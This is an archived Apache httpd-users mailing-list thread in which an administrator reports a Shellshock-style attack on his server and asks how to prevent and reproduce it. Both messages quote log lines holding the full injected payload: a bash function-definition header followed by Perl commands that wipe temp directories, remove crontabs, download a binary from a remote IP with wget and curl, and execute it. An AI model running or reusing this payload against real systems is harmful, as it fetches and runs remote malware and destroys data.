httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Victor Sterpu <vic...@casnt.ro>
Subject Re: [users@httpd] Security question
Date Thu, 02 Jul 2015 12:29:43 GMT
In the end the attack was succesfull. Log show the last command:
62.1.212.154 - - [01/Jul/2015:17:01:55 +0300] "GET / HTTP/1.1" 200 885 
"-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: 
text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm 
-rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; 
crontab -r ; killall -9 wget fetch curl lwp-download b f r xx y i.gif 
print start pscan pnscan ps ; wget http://80.68.94.216/sc.gif ; curl -O 
http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"

But I don't know how he launched this script.
How can I prevent this?
I was hoping the server would execute only local scripts, is there 
something I can do to allow only local scripts to be executed?


On 02.07.2015 15:13, Yehuda Katz wrote:
>
> It is an attempt to exploit a specific configuration. By the fact that 
> apache returned a 404 (the log line says so), you can see that attempt 
> was not successful.
>
> - Y
>
> Sent from a gizmo with a very small keyboard and hyperactive autocorrect.
>
> On Jul 2, 2015 8:00 AM, "Victor Sterpu" <victor@casnt.ro 
> <mailto:victor@casnt.ro>> wrote:
>
>     Hello
>
>     A hacker attacked a apache2 web server by HTTP injection.
>     The log show what he has done:
>     62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET
>     /phppath/cgi_wrapper HTTP/1.1" 404 280 "-" "() { :;};/usr/bin/perl
>     -e 'print \"Content-Type:
>     text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/
>     ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf
>     /var/tmp/.* ; crontab -r ; killall -9 wget fetch curl lwp-download
>     b f r xx y i.gif print start pscan pnscan ps ; wget
>     http://80.68.94.216/sc.gif ; curl -O http://80.68.94.216/sc.gif ;
>     chmod +x sc.gif ; nohup ./sc.gif & \");'"
>
>     How can I prevent this in the future and how can I reproduce?
>     I tried to reproduce but is not clear how he launched this command
>     and I want to know so I can test my vulnerabilities in the future.
>     The path "/phppath/cgi_wrapper" doesn't exist at all.
>
>     Thank you
>
>     ---------------------------------------------------------------------
>     To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
>     <mailto:users-unsubscribe@httpd.apache.org>
>     For additional commands, e-mail: users-help@httpd.apache.org
>     <mailto:users-help@httpd.apache.org>
>


Mime
View raw message